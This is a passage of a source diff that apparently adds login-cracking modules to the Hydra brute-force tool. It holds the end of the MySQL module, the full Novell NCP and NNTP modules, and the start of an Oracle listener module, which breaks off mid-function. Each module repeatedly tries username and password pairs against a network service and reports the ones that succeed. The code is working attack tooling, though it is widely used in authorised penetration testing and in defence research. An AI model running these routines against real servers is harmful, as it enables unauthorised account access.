"4.") && strstr(server_version, "5.")) { +#ifndef LIBMYSQLCLIENT + hydra_report(stderr, "[ERROR] Not an MySQL protocol or unsupported version,\ncheck configure to see if libmysql is found\n"); +#endif + free(buf); + return 2; + } + + free(buf); + return 0; +} + +/* prepare response to server greeting */ +char *hydra_mysql_prepare_auth(char *login, char *pass) { + unsigned char *response; + unsigned long login_len = strlen(login) > 32 ? 32 : strlen(login); + unsigned long response_len = 4 /* header */ + + 2 /* client flags */ + + 3 /* max packet len */ + + login_len + 1 + 8 /* scrambled password len */ ; + + response = (unsigned char *) malloc(response_len + 4); + if (response == NULL) { + fprintf(stderr, "[ERROR] could not allocate memory\n"); + return NULL; + } + memset(response, 0, response_len + 4); + + *((unsigned long *) response) = response_len - 4; + response[3] = 0x01; /* packet number */ + response[4] = 0x85; + response[5] = 0x24; /* client flags */ + response[6] = response[7] = response[8] = 0x00; /* max packet */ + memcpy(&response[9], login, login_len); /* login */ + response[9 + login_len] = '\0'; /* null terminate login */ + hydra_scramble((char *) &response[9 + login_len + 1], mysqlsalt, pass); + + return (char *) response; +} + +/* returns 0 if authentication succeed */ + +/* and 1 if failed */ +char hydra_mysql_parse_response(unsigned char *response) { + unsigned long response_len = *((unsigned long *) response) & 0xffffff; + + if (response_len < 4) + return 0; + + if (response[4] == 0xff) + return 1; + + return 0; +} + +char hydra_mysql_send_com_quit(int sock) { + char com_quit_packet[5] = { 0x01, 0x00, 0x00, 0x00, 0x01 }; + + hydra_send(sock, com_quit_packet, 5, 0); + return 0; +} + +int start_mysql(int sock, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *response = NULL, *login = NULL, *pass = NULL; + unsigned long response_len; + char res = 0; + char database[256]; + + login = hydra_get_next_login(); + pass = hydra_get_next_password(); + + if (miscptr) + strncpy(database, miscptr, sizeof(database)); + else { + strncpy(database, DEFAULT_DB, sizeof(database)); + if (verbose) + hydra_report(stderr, "[VERBOSE] using default db 'mysql'\n"); + } + + /* read server greeting */ + res = hydra_mysql_init(sock); + + if (res == 2) { + /* old reversing protocol trick did not work */ + /* try using the libmysql client if available */ + hydra_mysql_send_com_quit(sock); + sock = hydra_disconnect(sock); +#ifdef LIBMYSQLCLIENT + + if (mysql == NULL) { + mysql = mysql_init(NULL); + if (mysql == NULL) { + hydra_report(stderr, "[ERROR] Insufficient memory to allocate new mysql object\n"); + return 1; + } + } + /*mysql_options(&mysql,MYSQL_OPT_COMPRESS,0); */ + if (!mysql_real_connect(mysql, hydra_address2string(ip), login, pass, database, 0, NULL, 0)) { + int my_errno = mysql_errno(mysql); + + if (debug) + hydra_report(stderr, "[ERROR] Failed to connect to database: %s\n", mysql_error(mysql)); + + /* + Error: 1049 SQLSTATE: 42000 (ER_BAD_DB_ERROR) + Message: Unknown database '%s' + */ + if (my_errno == 1049) { + hydra_report(stderr, "[ERROR] Unknown database: %s\n", database); + } + + if (my_errno == 1251) { + hydra_report(stderr, "[ERROR] Client does not support authentication protocol requested by server\n"); + } + + /* + http://dev.mysql.com/doc/refman/5.0/en/error-messages-server.html + + Error: 1044 SQLSTATE: 42000 (ER_DBACCESS_DENIED_ERROR) + Message: Access denied for user '%s'@'%s' to database '%s' + + Error: 1045 SQLSTATE: 28000 (ER_ACCESS_DENIED_ERROR) + Message: Access denied for user '%s'@'%s' (using password: %s) + + */ + + //if the error is more critical, we just try to reconnect + //to the db later with the mysql_init + if ((my_errno != 1044) && (my_errno != 1045)) { + mysql_close(mysql); + mysql = NULL; + } + return 3; + } + + hydra_report_found_host(port, ip, "mysql", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) { + mysql_close(mysql); + mysql = NULL; + return 3; + } + return 1; +#else + hydra_child_exit(2); +#endif + } + + if (res == 1) + return 1; + + /* prepare client authentication packet */ + response = hydra_mysql_prepare_auth(login, pass); + if (response == NULL) + return 3; + response_len = *((unsigned long *) response) & 0xffffff; + + /* send client auth packet */ + /* dunny why, mysql IO code had problem reading my response. */ + /* When I send response_len bytes, it always read response_len-4 bytes */ + /* I fixed it just by sending 4 characters more. It is maybe not good */ + /* coding style, but working :) */ + if (hydra_send(sock, response, response_len + 4, 0) < 0) { + free(response); + return 1; + } + free(response); + + /* read authentication response */ + if ((response = hydra_mysql_receive_line(sock)) == NULL) + return 1; + res = hydra_mysql_parse_response((unsigned char *) response); + + if (!res) { + hydra_mysql_send_com_quit(sock); + sock = hydra_disconnect(sock); + hydra_report_found_host(port, ip, "mysql", fp); + hydra_completed_pair_found(); + free(response); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + + free(response); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + /* each try requires new connection */ + return 1; +} + +void service_mysql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_MYSQL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) { + hydra_mysql_send_com_quit(sock); + sock = hydra_disconnect(sock); + } +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_mysql(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) { + hydra_mysql_send_com_quit(sock); + sock = hydra_disconnect(sock); + } + hydra_child_exit(0); + return; + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +#ifndef LIBMYSQLCLIENT + + + +#endif + +/************************************************************************/ + +/* code belowe is copied from mysql 3.23.57 source code (www.mysql.com) */ + +/* and slightly modified (removed not needed parts of code, changed */ + +/* data types) */ + +/************************************************************************/ +struct hydra_rand_struct { + unsigned long seed1, seed2, max_value; + double max_value_dbl; +}; + +void hydra_randominit(struct hydra_rand_struct *rand_st, unsigned long seed1, unsigned long seed2) { /* For mysql 3.21.# */ + rand_st->max_value = 0x3FFFFFFFL; + rand_st->max_value_dbl = (double) rand_st->max_value; + rand_st->seed1 = seed1 % rand_st->max_value; + rand_st->seed2 = seed2 % rand_st->max_value; +} + +double hydra_rnd(struct hydra_rand_struct *rand_st) { + rand_st->seed1 = (rand_st->seed1 * 3 + rand_st->seed2) % rand_st->max_value; + rand_st->seed2 = (rand_st->seed1 + rand_st->seed2 + 33) % rand_st->max_value; + return (((double) rand_st->seed1) / rand_st->max_value_dbl); +} +void hydra_hash_password(unsigned long *result, const char *password) { + register unsigned long nr = 1345345333L, add = 7, nr2 = 0x12345671L; + unsigned long tmp; + + for (; *password; password++) { + if (*password == ' ' || *password == '\t') + continue; /* skipp space in password */ + tmp = (unsigned long) (unsigned char) *password; + nr ^= (((nr & 63) + add) * tmp) + (nr << 8); + nr2 += (nr2 << 8) ^ nr; + add += tmp; + } + result[0] = nr & (((unsigned long) 1L << 31) - 1L); /* Don't use sign bit (str2int) */ ; + result[1] = nr2 & (((unsigned long) 1L << 31) - 1L); + return; +} + +char *hydra_scramble(char *to, const char *message, const char *password) { + struct hydra_rand_struct rand_st; + unsigned long hash_pass[2], hash_message[2]; + char extra; + + if (password && password[0]) { + char *to_start = to; + + hydra_hash_password(hash_pass, password); + hydra_hash_password(hash_message, message); + hydra_randominit(&rand_st, hash_pass[0] ^ hash_message[0], hash_pass[1] ^ hash_message[1]); + while (*message++) + *to++ = (char) (floor(hydra_rnd(&rand_st) * 31) + 64); + extra = (char) (floor(hydra_rnd(&rand_st) * 31)); + while (to_start != to) + *(to_start++) ^= extra; + } + *to = 0; + return to; +} +#endif + +int service_mysql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-ncp.c b/hydra-ncp.c new file mode 100644 index 0000000..45c9612 --- /dev/null +++ b/hydra-ncp.c @@ -0,0 +1,197 @@ + +/* + * Novell Network Core Protocol Support - by David Maciejak @ GMAIL dot com + * Tested on Netware 6.5 + * + * you need to install libncp and libncp-dev (tested with version 2.2.6-3) + * + * you can passed full context as OPT + * + * example: ./hydra -L login -P passw 172.16.246.129 ncp .O=cx + * + */ + + +#include "hydra-mod.h" + +#ifndef LIBNCP +void dummy_ncp() { + printf("\n"); +} +#else + +#include +#include +#include +#include + +extern char *HYDRA_EXIT; +extern int child_head_no; + +typedef struct __NCP_DATA { + struct ncp_conn_spec spec; + struct ncp_conn *conn; + char *context; +} _NCP_DATA; + +//uncomment line below to see more trace stack +//#define NCP_DEBUG + +int start_ncp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + + char *login; + char *pass; + char context[256]; + unsigned int ncp_lib_error_code; + char *empty = ""; + int object_type = NCP_BINDERY_USER; + + _NCP_DATA *session; + + + session = malloc(sizeof(_NCP_DATA)); + memset(session, 0, sizeof(_NCP_DATA)); + login = empty; + pass = empty; + + + if (strlen(login = hydra_get_next_login()) == 0) { + login = empty; + } else { + if (miscptr) { + if (strlen(miscptr) + strlen(login) > sizeof(context)) { + free(session); + return 4; + } + memset(context, 0, sizeof(context)); + strncpy(context, login, strlen(login)); + strncpy(context + strlen(login), miscptr, sizeof(miscptr) + 1); + login = context; + } + } + + //login and password are case insensitive + //str_upper(login); + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + ncp_lib_error_code = ncp_find_conn_spec3(hydra_address2string(ip), login, "", 1, getuid(), 0, &session->spec); + if (ncp_lib_error_code) { + free(session); + return 1; + } + + ncp_lib_error_code = NWCCOpenConnByName(NULL, session->spec.server, NWCC_NAME_FORMAT_BIND, NWCC_OPEN_NEW_CONN, NWCC_RESERVED, &session->conn); + if (ncp_lib_error_code) { + free(session); + return 1; + } + + memset(session->spec.password, 0, sizeof(session->spec.password)); + memcpy(session->spec.password, pass, strlen(pass) + 1); + //str_upper(session->spec.password); + + ncp_lib_error_code = ncp_login_conn(session->conn, session->spec.user, object_type, session->spec.password); + switch (ncp_lib_error_code & 0x0000FFFF) { + case 0x0000: /* Success */ +#ifdef NCP_DEBUG + printf("Connection success (%s / %s). Error code: %X\n", login, pass, ncp_lib_error_code); +#endif + ncp_close(session->conn); + hydra_report_found_host(port, ip, "ncp", fp); //ok + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; //exit + free(session); + return 2; //next + break; + case 0x89DE: /* PASSWORD INVALID */ + case 0x89F0: /* BIND WILDCARD INVALID */ + case 0x89FF: /* NO OBJ OR BAD PASSWORD */ + case 0xFD63: /* FAILED_AUTHENTICATION */ + case 0xFDA7: /* NO_SUCH_ENTRY */ +#ifdef NCP_DEBUG + printf("Incorrect password (%s / %s). Error code: %X\n", login, pass, ncp_lib_error_code); +#endif + ncp_close(session->conn); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) { + free(session); + return 2; //next + } + break; + default: +#ifdef NCP_DEBUG + printf("Failed to open connection. Error code: %X\n", ncp_lib_error_code); +#endif + if (session->conn != NULL) + ncp_close(session->conn); + break; + } + free(session); + return 1; //reconnect +} + +void service_ncp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_NCP; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + case 2: + /* + * Here we start the password cracking process + */ + next_run = start_ncp(sock, ip, port, options, miscptr, fp); + break; + case 3: + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 4: + if (child_head_no == 0) + fprintf(stderr, "[ERROR] Optional parameter too long!\n"); + hydra_child_exit(0); + + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +#endif + +int service_ncp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-nntp.c b/hydra-nntp.c new file mode 100644 index 0000000..3d025f5 --- /dev/null +++ b/hydra-nntp.c @@ -0,0 +1,475 @@ +#include "hydra-mod.h" +#include "sasl.h" + +/* + +Based on: + +RFC 3977: Network News Transfer Protocol (NNTP) +RFC 4643: Network News Transfer Protocol (NNTP) Extension for Authentication + +*/ + +int nntp_auth_mechanism = AUTH_CLEAR; + +extern char *HYDRA_EXIT; +char *buf; + +char *nntp_read_server_capacity(int sock) { + char *ptr = NULL; + int resp = 0; + char *buf = NULL; + + do { + if (buf != NULL) + free(buf); + ptr = buf = hydra_receive_line(sock); + if (buf != NULL) { + if (isdigit((int) buf[0]) && buf[3] == ' ') + resp = 1; + else { + if (buf[strlen(buf) - 1] == '\n') + buf[strlen(buf) - 1] = 0; + if (buf[strlen(buf) - 1] == '\r') + buf[strlen(buf) - 1] = 0; +#ifdef NO_RINDEX + if ((ptr = strrchr(buf, '\n')) != NULL) { +#else + if ((ptr = rindex(buf, '\n')) != NULL) { +#endif + ptr++; + if (isdigit((int) *ptr) && *(ptr + 3) == ' ') + resp = 1; + } + } + } + } while (buf != NULL && resp == 0); + return buf; +} + +int start_nntp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = "\"\""; + char *login, *pass, buffer[300], buffer2[500]; + int i = 1; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + while (i > 0 && hydra_data_ready(s) > 0) + i = hydra_recv(s, buffer, 300); + + switch (nntp_auth_mechanism) { + case AUTH_LOGIN: + sprintf(buffer, "AUTHINFO SASL LOGIN\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (buf == NULL || strstr(buf, "383") == NULL) { + hydra_report(stderr, "[ERROR] NNTP LOGIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + strcpy(buffer2, login); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + + sprintf(buffer, "%.250s\r\n", buffer2); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (buf == NULL || strstr(buf, "383") == NULL) { + hydra_report(stderr, "[ERROR] NNTP LOGIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + strcpy(buffer2, pass); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%.250s\r\n", buffer2); + break; + case AUTH_PLAIN: + sprintf(buffer, "AUTHINFO SASL PLAIN\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (buf == NULL || strstr(buf, "383") == NULL) { + hydra_report(stderr, "[ERROR] NNTP PLAIN AUTH : %s\n", buf); + free(buf); + return 3; + } + free(buf); + + memset(buffer, 0, sizeof(buffer)); + sasl_plain(buffer, login, pass); + sprintf(buffer, "%.250s\r\n", buffer); + break; +#ifdef LIBOPENSSL + case AUTH_CRAMMD5:{ + int rc = 0; + char *preplogin; + + rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + if (rc) { + return 3; + } + + sprintf(buffer, "AUTHINFO SASL CRAM-MD5\r\n"); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + //get the one-time BASE64 encoded challenge + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (buf == NULL || strstr(buf, "383") == NULL) { + hydra_report(stderr, "[ERROR] NNTP CRAM-MD5 AUTH : %s\n", buf); + free(buf); + return 3; + } + + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf + 4); + free(buf); + + memset(buffer2, 0, sizeof(buffer2)); + sasl_cram_md5(buffer2, pass, buffer); + + sprintf(buffer, "%s %.250s", preplogin, buffer2); + hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer)); + sprintf(buffer, "%.250s\r\n", buffer); + free(preplogin); + } + break; + + case AUTH_DIGESTMD5:{ + sprintf(buffer, "AUTHINFO SASL DIGEST-MD5\r\n"); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) + return 1; + //receive + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (buf == NULL || strstr(buf, "383") == NULL) { + hydra_report(stderr, "[ERROR] NNTP DIGEST-MD5 AUTH : %s\n", buf); + free(buf); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buf + 4); + free(buf); + + if (verbose) + hydra_report(stderr, "DEBUG S: %s\n", buffer); + sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "nntp", NULL, 0, NULL); + if (buffer2 == NULL) + return 3; + + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", buffer2); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%s\r\n", buffer2); + } + break; + +#endif + + case AUTH_NTLM:{ + unsigned char buf1[4096]; + unsigned char buf2[4096]; + + //send auth and receive challenge + buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2)); + sprintf(buffer, "AUTHINFO SASL NTLM %s\r\n", (char *) buf1); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (buf == NULL || strstr(buf, "383") == NULL) { + hydra_report(stderr, "[ERROR] NNTP NTLM AUTH : %s\n", buf); + free(buf); + return 3; + } + //recover challenge + from64tobits((char *) buf1, buf + 4); + free(buf); + + buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL); + to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2)); + sprintf(buffer, "%s\r\n", (char *) buf1); + } + break; + + default:{ + sprintf(buffer, "AUTHINFO USER %.250s\r\n", login); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + if (buf[0] != '3') { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an NNTP protocol or service shutdown: %s\n", buf); + free(buf); + return (3); + } + free(buf); + sprintf(buffer, "AUTHINFO PASS %.250s\r\n", pass); + } + break; + } + + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + + if (buf[0] == '2') { + hydra_report_found_host(port, ip, "nntp", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; + } + + free(buf); + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 2; +} + +void service_nntp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int i = 0, run = 1, next_run = 1, sock = -1; + int myport = PORT_NNTP, mysslport = PORT_NNTP_SSL, disable_tls = 0; + char *buffer1 = "CAPABILITIES\r\n"; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } +// usleep(300000); + buf = hydra_receive_line(sock); + if (buf == NULL || buf[0] != '2') { /* check the first line */ + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not an NNTP protocol or service shutdown: %s\n", buf); + hydra_child_exit(2); + } + free(buf); + + /* send capability request */ + if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0) + hydra_child_exit(2); + buf = nntp_read_server_capacity(sock); + + if (buf == NULL) { + hydra_child_exit(2); + } +#ifdef LIBOPENSSL + if (!disable_tls) { + /* if we got a positive answer */ + if (strstr(buf, "STARTTLS") != NULL) { + hydra_send(sock, "STARTTLS\r\n", strlen("STARTTLS\r\n"), 0); + free(buf); + buf = hydra_receive_line(sock); + + /* 382 Begin TLS negotiation now */ + if (buf == NULL || strstr(buf, "382") == NULL) { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS negotiation failed\n"); + } else { + free(buf); + if ((hydra_connect_to_ssl(sock) == -1)) { + if (verbose) + hydra_report(stderr, "[ERROR] Can't use TLS\n"); + disable_tls = 1; + run = 1; + break; + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] TLS connection done\n"); + } + /* ask again capability request but in TLS mode */ + if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0) + hydra_child_exit(2); + /* we asking again cause often plain and login can only + be negociate in SSL tunnel + */ + buf = nntp_read_server_capacity(sock); + if (buf == NULL) { + hydra_child_exit(2); + } + } + } + } +#endif + +/* +AUTHINFO USER SASL +SASL PLAIN DIGEST-MD5 LOGIN NTLM CRAM-MD5 +*/ + +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "SASL\\s.*NTLM")) { +#else + if (strstr(buf, "NTLM") != NULL) { +#endif + nntp_auth_mechanism = AUTH_NTLM; + } +#ifdef LIBOPENSSL + +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "SASL\\s.*DIGEST-MD5")) { +#else + if (strstr(buf, "DIGEST-MD5") != NULL) { +#endif + nntp_auth_mechanism = AUTH_DIGESTMD5; + } +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "SASL\\s.*CRAM-MD5")) { +#else + if (strstr(buf, "CRAM-MD5") != NULL) { +#endif + nntp_auth_mechanism = AUTH_CRAMMD5; + } +#endif +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "SASL\\s.*PLAIN")) { +#else + if (strstr(buf, "PLAIN") != NULL) { +#endif + nntp_auth_mechanism = AUTH_PLAIN; + } +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "SASL\\s.*LOGIN")) { +#else + if (strstr(buf, "LOGIN") != NULL) { +#endif + nntp_auth_mechanism = AUTH_LOGIN; + } +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "AUTHINFO\\sUSER")) { +#else + if (strstr(buf, "AUTHINFO USER") != NULL) { +#endif + nntp_auth_mechanism = AUTH_CLEAR; + } + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + for (i = 0; i < strlen(miscptr); i++) + miscptr[i] = (char) toupper((int) miscptr[i]); + + if (strncmp(miscptr, "USER", 4) == 0) + nntp_auth_mechanism = AUTH_CLEAR; + + if (strncmp(miscptr, "LOGIN", 5) == 0) + nntp_auth_mechanism = AUTH_LOGIN; + + if (strncmp(miscptr, "PLAIN", 5) == 0) + nntp_auth_mechanism = AUTH_PLAIN; + +#ifdef LIBOPENSSL + if (strncmp(miscptr, "CRAM-MD5", 8) == 0) + nntp_auth_mechanism = AUTH_CRAMMD5; + + if (strncmp(miscptr, "DIGEST-MD5", 10) == 0) + nntp_auth_mechanism = AUTH_DIGESTMD5; +#endif + + if (strncmp(miscptr, "NTLM", 4) == 0) + nntp_auth_mechanism = AUTH_NTLM; + + } + if (verbose) { + switch (nntp_auth_mechanism) { + case AUTH_CLEAR: + hydra_report(stderr, "[VERBOSE] using NNTP AUTHINFO USER mechanism\n"); + break; + case AUTH_LOGIN: + hydra_report(stderr, "[VERBOSE] using NNTP LOGIN AUTH mechanism\n"); + break; + case AUTH_PLAIN: + hydra_report(stderr, "[VERBOSE] using NNTP PLAIN AUTH mechanism\n"); + break; +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + hydra_report(stderr, "[VERBOSE] using NNTP CRAM-MD5 AUTH mechanism\n"); + break; + case AUTH_DIGESTMD5: + hydra_report(stderr, "[VERBOSE] using NNTP DIGEST-MD5 AUTH mechanism\n"); + break; +#endif + case AUTH_NTLM: + hydra_report(stderr, "[VERBOSE] using NNTP NTLM AUTH mechanism\n"); + break; + } + } + usleep(25000); + free(buf); + next_run = 2; + break; + case 2: /* run the cracking function */ + next_run = start_nntp(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_nntp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-oracle-listener.c b/hydra-oracle-listener.c new file mode 100644 index 0000000..a4f5208 --- /dev/null +++ b/hydra-oracle-listener.c @@ -0,0 +1,339 @@ + +/* +david: + +PASSWORDS_LISTENER in listener.ora can be in clear or in plain mode, +this module support the 2 modes, use -m PLAIN or -m CLEAR on the cmd +line. Default is plain (oracle 10 uses it). + +Thanks to Marcell for the plain mode analysis available +at http://marcellmajor.com/frame_listenerhash.html + +*/ + +#include "hydra-mod.h" +#ifndef LIBOPENSSL +#include +void dummy_oracle_listener() { + printf("\n"); +} +#else +#include +#include +#define HASHSIZE 17 + +extern char *HYDRA_EXIT; +char *buf; +unsigned char *hash; +int sid_mechanism = AUTH_PLAIN; + +int initial_permutation(unsigned char **result, char *p_str, int *sz) { + int k = 0; + int i = strlen(p_str); + char *buff; + + //expand the string with zero so that length is a multiple of 4 + while ((i % 4) != 0) { + i = i + 1; + } + *sz = 2 * i; + + if ((buff = malloc(i)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + return 1; + } + memset(buff, 0, i); + strncpy(buff, p_str, strlen(p_str)); + + //swap the order of every byte pair + for (k = 0; k < i; k += 2) { + char bck = buff[k + 1]; + + buff[k + 1] = buff[k]; + buff[k] = bck; + } + //convert to unicode + if ((*result = malloc(2 * i)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + free(buff); + return 1; + } + memset(*result, 0, 2 * i); + for (k = 0; k < i; k++) { + (*result)[2 * k] = buff[k]; + } + free(buff); + + return 0; +} + +int ora_hash(unsigned char **orahash, unsigned char *buf, int len) { + int i; + + if ((*orahash = malloc(HASHSIZE)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + return 1; + } + + for (i = 0; i < 8; i++) { + sprintf(((char *) *orahash) + i * 2, "%02X", buf[len - 8 + i]); + } + return 0; +} + +int convert_byteorder(unsigned char **result, int size) { + int i = 0; + char *buff; + + if ((buff = malloc(size)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + return 1; + } + memcpy(buff, *result, size); + + while (i < size) { + buff[i + 0] = (*result)[i + 3]; + buff[i + 1] = (*result)[i + 2]; + buff[i + 2] = (*result)[i + 1]; + buff[i + 3] = (*result)[i + 0]; + i += 4; + } + memcpy(*result, buff, size); + free(buff); + return 0; +} + +int ora_descrypt(unsigned char **rs, unsigned char *result, int siz) { + int i = 0; + char lastkey[8]; + des_key_schedule ks1; + unsigned char key1[8] = { 0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF }; + unsigned char ivec1[] = { 0, 0, 0, 0, 0, 0, 0, 0 }; + unsigned char *desresult; + + memset(ivec1, 0, sizeof(ivec1)); + if ((desresult = malloc(siz)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + return 1; + } + des_key_sched((C_Block *) key1, ks1); + des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT); + + for (i = 0; i < 8; i++) { + lastkey[i] = desresult[siz - 8 + i]; + } + + des_key_sched((C_Block *) lastkey, ks1); + memset(desresult, 0, siz); + memset(ivec1, 0, sizeof(ivec1)); + des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT); + + if ((*rs = malloc(siz)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + free(desresult); + return 1; + } + memcpy(*rs, desresult, siz); + + return 